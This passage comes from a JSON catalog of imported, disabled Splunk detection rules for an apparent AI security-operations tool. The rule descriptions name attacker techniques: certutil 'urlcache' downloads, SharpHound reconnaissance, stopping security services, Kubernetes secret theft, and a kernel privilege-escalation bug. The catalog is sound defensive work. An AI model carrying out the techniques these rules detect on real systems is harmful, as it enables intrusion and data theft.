non-standard paths. It leverages Endpoint Detection and Response (EDR) data, focusing on process names and original file names outside typical directories. This activity is significant because InstallUtil.exe is often used by attackers to execute malicious code or scripts. 
If confirmed malicious, this behavior could allow an attacker to bypass security controls, execute arbitrary code, and potentially gain unauthorized access or persist within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003", "T1218.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-installutil-in-non-standard-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dcf74b22-7933-11ec-857c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_installutil_in_non_standard_path.yml" } }, { "id": "splunk-security-content-dcfd6b40-42f9-469d-a433-2e53f7486664", "type": "detection", "name": "Detect Prohibited Applications Spawning cmd exe", "description": "The following analytic detects executions of cmd.exe spawned by processes that are commonly abused by attackers and do not typically launch cmd.exe. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process GUID, process name, parent process, and command-line executions. This activity is significant because it may indicate an attempt to execute unauthorized commands or scripts, often a precursor to further malicious actions. 
If confirmed malicious, this behavior could lead to unauthorized code execution, privilege escalation, or persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-prohibited-applications-spawning-cmd-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dcfd6b40-42f9-469d-a433-2e53f7486664", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_prohibited_applications_spawning_cmd_exe.yml" } }, { "id": "splunk-security-content-dcfd6b40-42f9-469d-a433-2e53f7489ff4", "type": "detection", "name": "Detect Unauthorized Assets by MAC address", "description": "The following analytic identifies unauthorized devices attempting to connect to the organization's network by inspecting DHCP request packets. It detects this activity by comparing the MAC addresses in DHCP requests against a list of known authorized devices stored in the assets_by_str.csv file. This activity is significant for a SOC because unauthorized devices can pose security risks, including potential data breaches or network disruptions. 
If confirmed malicious, this activity could allow an attacker to gain unauthorized network access, potentially leading to further exploitation or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-unauthorized-assets-by-mac-address.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dcfd6b40-42f9-469d-a433-2e53f7489ff4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_unauthorized_assets_by_mac_address.yml" } }, { "id": "splunk-security-content-dd04b29a-beed-11eb-87bc-acde48001122", "type": "detection", "name": "Detect SharpHound Usage", "description": "The following analytic detects the usage of the SharpHound binary by identifying its original filename, `SharpHound.exe`, and the process name. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process metadata and command-line executions. SharpHound is a tool used for Active Directory enumeration, often by attackers during the reconnaissance phase. 
If confirmed malicious, this activity could allow an attacker to map out the network, identify high-value targets, and plan further attacks, potentially leading to privilege escalation and lateral movement within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001", "T1069.002", "T1087.001", "T1087.002", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-sharphound-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dd04b29a-beed-11eb-87bc-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_sharphound_usage.yml" } }, { "id": "splunk-security-content-dd0f07ea-f08f-4d88-96e5-cb58156e82b6", "type": "detection", "name": "Windows Service Stop Attempt", "description": "The following analytic identifies attempts to stop services on a system using `net.exe`, `sc.exe` or the \"Stop-Service\" cmdlet. It leverages Endpoint Detection and Response (EDR) telemetry. This activity can be significant as adversaries often terminate security or critical services to evade detection and further their objectives. 
If confirmed malicious, this behavior could allow attackers to disable security defenses, facilitate ransomware encryption, or disrupt essential services, leading to potential data loss or system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-stop-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dd0f07ea-f08f-4d88-96e5-cb58156e82b6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_stop_attempt.yml" } }, { "id": "splunk-security-content-dd16294f-44d2-40b4-a869-542c0b85113a", "type": "detection", "name": "Linux Auditd Copy Fail Privilege Escalation", "description": "Detects the exploitation pattern associated with Copy Fail.\nCopy Fail (CVE-2026-31431) is a logic bug in the Linux kernel's authentication cryptographic template.\nIt lets an unprivileged local user trigger a deterministic, controlled 4-byte write into the page cache of any readable file on the system.\nA single 732-byte Python script can edit a setuid binary and obtain root on essentially all Linux distributions shipped since 2017.\nThis search relies on the auditd configuration linked in the references section. 
If you are using a custom configuration, make sure the Key names are the same or adapt the search accordingly.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-copy-fail-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dd16294f-44d2-40b4-a869-542c0b85113a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_copy_fail_privilege_escalation.yml" } }, { "id": "splunk-security-content-dd6afee6-e0a3-4028-a089-f47dd2842c22", "type": "detection", "name": "Kubernetes Anomalous Outbound Network Activity from Process", "description": "The following analytic identifies anomalously high outbound network activity from processes running within containerized workloads in a Kubernetes environment. It leverages Network Performance Monitoring metrics collected via an OTEL collector and pulled from Splunk Observability Cloud. The detection compares recent network metrics (tcp.bytes, tcp.new_sockets, tcp.packets, udp.bytes, udp.packets) over the last hour with the average metrics over the past 30 days. This activity is significant as it may indicate data exfiltration, process modification, or container compromise. 
If confirmed malicious, it could lead to unauthorized data exfiltration, communication with malicious entities, or further attacks within the containerized environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-anomalous-outbound-network-activity-from-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dd6afee6-e0a3-4028-a089-f47dd2842c22", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_anomalous_outbound_network_activity_from_process.yml" } }, { "id": "splunk-security-content-dd6d1f16-adc0-4e87-9c34-06189516b803", "type": "detection", "name": "Windows Known Abused DLL Loaded Suspiciously", "description": "The following analytic detects when DLLs with known abuse history are loaded from an unusual location. This activity may represent an attacker performing a DLL search order or sideload hijacking technique. These techniques are used to gain persistence as well as elevate privileges on the target system. 
This detection relies on Sysmon EID7 and is compatible with all Official Sysmon TA versions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-known-abused-dll-loaded-suspiciously.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dd6d1f16-adc0-4e87-9c34-06189516b803", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_known_abused_dll_loaded_suspiciously.yml" } }, { "id": "splunk-security-content-dd7798cf-c4f5-4114-ad0f-beacd9a33708", "type": "detection", "name": "O365 Email Send and Hard Delete Exfiltration Behavior", "description": "The following analytic identifies when an O365 email account sends and then hard deletes an email to an external recipient within a short period (within 1 hour). This behavior may indicate a compromised account where the threat actor is attempting to remove forensic artifacts or evidence of exfiltration activity. 
This behavior is often seen when threat actors want to reduce the probability of detection by the compromised account owner.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.001", "T1070.008", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-send-and-hard-delete-exfiltration-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dd7798cf-c4f5-4114-ad0f-beacd9a33708", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_send_and_hard_delete_exfiltration_behavior.yml" } }, { "id": "splunk-security-content-dd7da098-83b8-4c48-b09d-e51aeb621e81", "type": "detection", "name": "Windows Net System Service Discovery", "description": "The following analytic detects the enumeration of Windows services using the net start command, which is a built-in utility that lists all running services on a system. Adversaries, system administrators, or automated tools may use this command to gain situational awareness of what services are active, identify potential security software, or discover opportunities for privilege escalation and lateral movement. The execution of net start is often associated with reconnaissance activity during the early stages of an intrusion, as attackers attempt to map out the system\u2019s defense mechanisms and operational services. By monitoring process execution for instances of cmd.exe /c net start or similar command-line usage, defenders can detect potentially suspicious activity. 
Correlating this behavior with other reconnaissance commands, such as tasklist or sc query, strengthens detection fidelity. While net start is not inherently malicious, unusual or repeated use in non-administrative contexts should be flagged for further investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-net-system-service-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dd7da098-83b8-4c48-b09d-e51aeb621e81", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_net_system_service_discovery.yml" } }, { "id": "splunk-security-content-dd83407e-439f-11ec-ab8e-acde48001122", "type": "detection", "name": "Network Discovery Using Route Windows App", "description": "The following analytic detects the execution of the `route.exe` Windows application, commonly used for network discovery. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events. This activity is significant because adversaries often use `route.exe` to map network routes and identify potential targets within a network. If confirmed malicious, this behavior could allow attackers to gain insights into network topology, facilitating lateral movement and further exploitation. 
Note that false positives may occur due to legitimate administrative tasks or automated scripts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1016.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/network-discovery-using-route-windows-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dd83407e-439f-11ec-ab8e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/network_discovery_using_route_windows_app.yml" } }, { "id": "splunk-security-content-dda126d7-1d99-4f0b-b72a-4c14031f9398", "type": "detection", "name": "Windows Access Token Manipulation Winlogon Duplicate Token Handle", "description": "The following analytic detects a process attempting to access winlogon.exe to duplicate its handle. This is identified using Sysmon EventCode 10, focusing on processes targeting winlogon.exe with specific access rights. This activity is significant because it is a common technique used by adversaries to escalate privileges by leveraging the high privileges and security tokens associated with winlogon.exe. 
If confirmed malicious, this could allow an attacker to gain elevated privileges, potentially leading to full system compromise and unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-access-token-manipulation-winlogon-duplicate-token-handle.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dda126d7-1d99-4f0b-b72a-4c14031f9398", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_access_token_manipulation_winlogon_duplicate_token_handle.yml" } }, { "id": "splunk-security-content-ddf82fcb-e9ee-40e3-8712-a50b5bf323fc", "type": "detection", "name": "Windows PowerShell ScheduleTask", "description": "The following analytic detects potential malicious activities involving PowerShell's task scheduling cmdlets. It leverages PowerShell Script Block Logging (EventCode 4104) to identify unusual or suspicious use of cmdlets like 'New-ScheduledTask' and 'Set-ScheduledTask'. This activity is significant as attackers often use these cmdlets for persistence and remote execution of malicious code. If confirmed malicious, this could allow attackers to maintain access, deliver additional payloads, or execute ransomware, leading to data theft or other severe impacts. 
Immediate investigation and mitigation are crucial to prevent further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-scheduletask.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ddf82fcb-e9ee-40e3-8712-a50b5bf323fc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_scheduletask.yml" } }, { "id": "splunk-security-content-de365ffa-42f5-46b5-b43f-fa72290b8218", "type": "detection", "name": "Okta Multiple Users Failing To Authenticate From Ip", "description": "The following analytic identifies instances where more than 10 unique user accounts have failed to authenticate from a single IP address within a 5-minute window in an Okta tenant. This detection uses OktaIm2 logs ingested via the Splunk Add-on for Okta Identity Cloud. Such activity is significant as it may indicate brute-force attacks or password spraying attempts. 
If confirmed malicious, this behavior suggests an external entity is attempting to compromise multiple user accounts, potentially leading to unauthorized access to organizational resources and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-multiple-users-failing-to-authenticate-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "de365ffa-42f5-46b5-b43f-fa72290b8218", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_multiple_users_failing_to_authenticate_from_ip.yml" } }, { "id": "splunk-security-content-de62b809-a04d-46b5-9a15-8298d330f0c8", "type": "detection", "name": "Linux Stdout Redirection To Dev Null File", "description": "The following analytic detects command-line activities that redirect stdout or stderr to the /dev/null file. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. This behavior is significant as it can indicate attempts to hide command outputs, a technique observed in the CyclopsBlink malware to conceal modifications to iptables firewall settings. 
If confirmed malicious, this activity could allow an attacker to stealthily alter system configurations, potentially leading to unauthorized access or persistent control over the compromised machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-stdout-redirection-to-dev-null-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "de62b809-a04d-46b5-9a15-8298d330f0c8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_stdout_redirection_to_dev_null_file.yml" } }, { "id": "splunk-security-content-de7fcadc-04f3-11ec-a241-acde48001122", "type": "detection", "name": "AdsiSearcher Account Discovery", "description": "The following analytic detects the use of the `[Adsisearcher]` type accelerator in PowerShell to query Active Directory for domain users. It leverages PowerShell Script Block Logging (EventCode=4104) to identify script blocks containing `[adsisearcher]`, `objectcategory=user`, and `.findAll()`. This activity is significant as it may indicate an attempt by adversaries or Red Teams to enumerate domain users for situational awareness and Active Directory discovery. 
If confirmed malicious, this could lead to further reconnaissance, privilege escalation, or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/adsisearcher-account-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "de7fcadc-04f3-11ec-a241-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/adsisearcher_account_discovery.yml" } }, { "id": "splunk-security-content-de81bc46-9213-11eb-adc9-acde48001122", "type": "detection", "name": "Disabling NoRun Windows App", "description": "The following analytic detects the modification of the Windows registry to disable the Run application in the Start menu. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun\" with a value of \"0x00000001\". This activity is significant because the Run application is a useful shortcut for executing known applications and scripts. 
If confirmed malicious, this action could hinder system cleaning efforts and make it more difficult to run essential tools, thereby aiding malware persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabling-norun-windows-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "de81bc46-9213-11eb-adc9-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabling_norun_windows_app.yml" } }, { "id": "splunk-security-content-ded9f9d7-edb8-48cf-8b72-1b459eee6785", "type": "detection", "name": "Cisco Smart Install Port Discovery and Status", "description": "This analytic detects network traffic to TCP port 4786, which is used by the Cisco Smart Install protocol. Smart Install is a plug-and-play configuration and image-management feature that helps customers to deploy Cisco switches. This protocol has been exploited via CVE-2018-0171, a vulnerability that allows unauthenticated remote attackers to execute arbitrary code or cause denial of service conditions. Recently, Cisco Talos reported that a Russian state-sponsored threat actor called \"Static Tundra\" has been actively exploiting this vulnerability to compromise unpatched and end-of-life network devices. 
Monitoring for traffic to this port can help identify potential exploitation attempts or unauthorized Smart Install activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-smart-install-port-discovery-and-status.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ded9f9d7-edb8-48cf-8b72-1b459eee6785", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_smart_install_port_discovery_and_status.yml" } }, { "id": "splunk-security-content-df275a44-4527-443b-b884-7600e066e3eb", "type": "detection", "name": "GetWmiObject Ds Group with PowerShell", "description": "The following analytic identifies the execution of `powershell.exe` with command-line arguments used to query domain groups via the `Get-WmiObject` cmdlet and the `-class ds_group` parameter.\nThis detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions.\nThis activity is significant as it indicates potential reconnaissance efforts by adversaries to enumerate domain groups, which is a common step in Active Directory Discovery.\nIf confirmed malicious, this could allow attackers to gain insights into the domain structure, aiding in further attacks and privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, 
"verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getwmiobject-ds-group-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "df275a44-4527-443b-b884-7600e066e3eb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getwmiobject_ds_group_with_powershell.yml" } }, { "id": "splunk-security-content-df6e9cae-5257-4a34-8f3a-df49fa0f5c46", "type": "detection", "name": "Kubernetes Abuse of Secret by Unusual User Name", "description": "The following analytic detects unauthorized access or misuse of Kubernetes Secrets by unusual user names. It leverages Kubernetes Audit logs to identify anomalies in access patterns by analyzing the source of requests based on user names. This activity is significant for a SOC as Kubernetes Secrets store sensitive information like passwords, OAuth tokens, and SSH keys, making them critical assets. 
If confirmed malicious, this activity could lead to unauthorized access to sensitive systems or data, potentially resulting in significant security breaches and exfiltration of sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-abuse-of-secret-by-unusual-user-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "df6e9cae-5257-4a34-8f3a-df49fa0f5c46", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_abuse_of_secret_by_unusual_user_name.yml" } }, { "id": "splunk-security-content-df74f45f-01c8-4fd6-bcb8-f6a9ea58307a", "type": "detection", "name": "Windows Cisco Secure Endpoint Related Service Stopped", "description": "The following analytic detects the suspicious termination of known services commonly targeted by ransomware before file encryption. It leverages Windows System Event Logs (EventCode 7036) to identify when critical services such as Volume Shadow Copy, backup, and antivirus services are stopped. This activity is significant because ransomware often disables these services to avoid errors and ensure successful file encryption. 
If confirmed malicious, this behavior could lead to widespread data encryption, rendering files inaccessible and potentially causing significant operational disruption and data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-cisco-secure-endpoint-related-service-stopped.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "df74f45f-01c8-4fd6-bcb8-f6a9ea58307a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_cisco_secure_endpoint_related_service_stopped.yml" } }, { "id": "splunk-security-content-dfc18a5a-946e-44ee-a373-c0f60d06e676", "type": "detection", "name": "Windows SQL Spawning CertUtil", "description": "The following analytic detects the use of certutil to download software, specifically when spawned by SQL-related processes. This detection leverages Endpoint Detection and Response (EDR) data, focusing on command-line executions involving certutil with parameters like *urlcache* and *split*. This activity is significant as it may indicate a compromise by threat actors, such as Flax Typhoon, who use certutil to establish persistent VPN connections. 
If confirmed malicious, this behavior could allow attackers to maintain access, monitor system availability, and potentially escalate to data theft or ransomware deployment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sql-spawning-certutil.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dfc18a5a-946e-44ee-a373-c0f60d06e676", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sql_spawning_certutil.yml" } }, { "id": "splunk-security-content-e010ddf5-e9a5-44e5-bdd6-0c919ba8fc8b", "type": "detection", "name": "ASL AWS Network Access Control List Deleted", "description": "The following analytic detects the deletion of AWS Network Access Control Lists (ACLs). It leverages AWS CloudTrail logs to identify events where a user deletes a network ACL entry. This activity is significant because deleting a network ACL can remove critical access restrictions, potentially allowing unauthorized access to cloud instances. 
If confirmed malicious, this action could enable attackers to bypass network security controls, leading to unauthorized access, data exfiltration, or further compromise of the cloud environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-network-access-control-list-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e010ddf5-e9a5-44e5-bdd6-0c919ba8fc8b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_network_access_control_list_deleted.yml" } }, { "id": "splunk-security-content-e02af35c-1de5-4afe-b4be-f45aba57272b", "type": "detection", "name": "GetNetTcpconnection with PowerShell", "description": "The following analytic identifies the execution of `powershell.exe` with the `Get-NetTcpConnection` command, which lists current TCP connections on a system. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. Monitoring this activity is significant as it may indicate an adversary or Red Team performing network reconnaissance or situational awareness. 
